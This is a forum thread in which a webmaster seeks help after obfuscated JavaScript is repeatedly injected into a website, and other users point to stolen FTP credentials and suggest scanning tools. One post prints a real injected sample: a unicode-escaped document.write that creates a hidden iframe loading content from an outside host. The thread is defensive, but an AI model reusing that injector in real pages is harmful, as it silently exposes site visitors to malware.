the site(www.kshitij.com) is on hostgator linux server, using SSI, JS and simple HTML and come cgi script to update site daily. no database is being used. virus code written automaticaly into page code online,its a strange java script code. Most of the high viewed pages are being attacking by a trojon virus. Guys what would u do if this happened to you? She is the sites webmaster, she needs help asap Please can anyone help her? thanks a bunch folks.
Tell him to reset his FTP passwords, this is something that is happening to many individuals on many different Web Hosting providers. The Trojan seems to be a type of Key Logger. Check out this article: http://www.usatoday.com/tech/news/computersecurity/2008-03-31-javascript-hackers_N.htm
Do you care to share the signature of the malicious code? I had a site on one of my servers that had been infected and re-infected vi injection of malicious javascript. Basically, it is done using an XSS attack to add javascript to several css files. what I did was to set up a simple scanner that looked for the signature code in all sites on my server, then back-traced logs at the time of infection to sort it out.
hi, actually i was having problem to log in and post at here yesterday so pingpong123 posted the problem on behalf of me. this is the one type of virus code; document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0032\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e') Code (markup): there are lots of other code too. i have kaspersky on my local machine so its can;t allow me to keep those code into my machine. meanwhile i have this. the Trojan basically write into any file which we use into the site using SSI and also write sometime into JS files. it basically attack home and highly viewed page on the site. regarding FTP password i changed its frequently but no use. 1) also do you guys have any idea from where Trojan is coming to the website. as my client is accessing the website from India and webserver is on USA. i also would like to know who is responsible for this? 2) do you think the Hostgetor server is safe? 3) is there any tool on net by which i can test the current coding of all pages of the website, to make sure the code is correctly made specially JS and html code? i am looking for permanent solution for this. can any one help me or suggest me about prevention. Thanks.
The signature code that I have seen has been a couple of different things: 1. iframe that linked to a virus. 2. Javascript encrypted link that also linked to the virus. This is done using the Javascript eval() function. 3. A large list of links that were placed in a hidden div. SEO technique. Just to clear things up, this is not a server related issue, it's happening because that virus is most likely a key logger or packet sniffer and is logging your FTP credentials, at least that is what I have seen of this in the past year. This is impacted a larger number of clients on a large number of Hosting providers.
also i found that virus are on written on js files only. so is there are way on net by which i can validate html code and JS file code?
sujata: Thanks for the JS code. I'll add it to my collection. Virustotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines You can also try my Unmask Parasites service (beta). It checks web pages for hidden illicit content (i.e. invisible links, iframes, obfuscated scripts and redirects)
As I said these hackings have nothing to do with your Host, they were not infultrated through a server vulnerability so they are going to tell you that their servers are secure...because they are.
hello EH Justin! I would like to ask you in my case then who is responsible? how do i prevent it along with password change? please suggest. Thansk.
hi UseShots! I have tried both tool withing them "Virustotal" only scan file which are on local machine, not online webpages. Unmask Parasites ........i used for whole site checking don;t know how much files it has scanned. do i need to give each url to scan it?
Their a lots of things you can do to help prevent it. - Run an anti-virus scan on a regular basis. - Make sure you reset your passwords every couple of months. - Use strong passwords with a combination of uppercase letters, lowercase letters, and special characters. - If your webhost offers Secure FTP (SFTP), or FTP over TLS, then take advantage of that. One more important thing I can suggest is to make sure you keep the scripts on your account up to date. Scripts like PHPBB and Wordpress are highly targetted and can contain large vulnerabilities if not updated regularly.
Send me a PM if you are still having problems. I have an idea on how to clean it all up just through ftp access.
sujata: You can save the the web pages and js file and then send them to VirusTotal. Check the screenshots of VirusTotal results for a few JS files here: http://www.finjan.com/MCRCblog.aspx?EntryId=1993 Unmask Parasites service only checks the web page you specified. It's not an anti-virus software. It just reveals suspicious hidden content. As a site owner you can spot unwanted stuff that may indicate that your website has been compromised. I.e. anti-virus software checks if the web pages is harmful for your site visitors and doesn't care if it contains illicit but absolutely harmless for visitors hidden links. However, for site owners, the fact that their web pages contain unwanted hidden links may be a stong evidence that their site has been hacked. This service is an early beta (only a couple of weeks old). I'm impoving the detection capabilities of the service almost every day. I'm interesting in hearing any feedback to improve the service (feature requests, false positives and negatives, malware obfuscation techniques, etc.) Another service you can try is Google's Safe Browsing diagnostics. It checks if the site you specified, was involved in malware dissemination during the last 90 days. For example: http://www.google.com/safebrowsing/diagnostic?site=kk6.us says that kk6. us is listed as suspicious and over the past 90 days, kk6. us/ appeared to function as an intermediary for the infection of 83 site(s). So you find a script pointing to a third-party site, you can check that site. Unfortunately, Google's diagnostics is based on their crawler, and it may lack data about new and noindex sites. I see the "Google has not visited this site within the past 90 days." massage quite often. Anyway, if the sites is listed as suspicious, you should be alarmed. That's why, in the Unmask Parasites reports, you can see links to Google's Safe Browsing diagnostics pages for every domain found on a page. P.S. I hope the message doesn't sound as shameless self-promotion. I tried to explain what you can expect from my service and share some information about other services.
A few days back my sites were also infected by this virus and trojans and I do this http://forums.digitalpoint.com/showthread.php?t=901622 Now everything is going fine now.
RealTimeAgent: Thanks for sharing this information. So, keep you passwords secure and change them every time you suspect your site has been compromised.
hi guys sorry for late update! I yes i change my FTP password when its come everytime. but it comes again and again now we are using filezilla FTP software provided by hosting company, they told us to use it but problem is same. we do check all machine on our office using Kaspersky, but how do we scan dedicated webserver? see my client is using dedicated server, and we are still confussed from where its comming its server fault as its firewall or antivirus is not strong or our fault? that is stll not cleared. we are simply comfussed what to do more........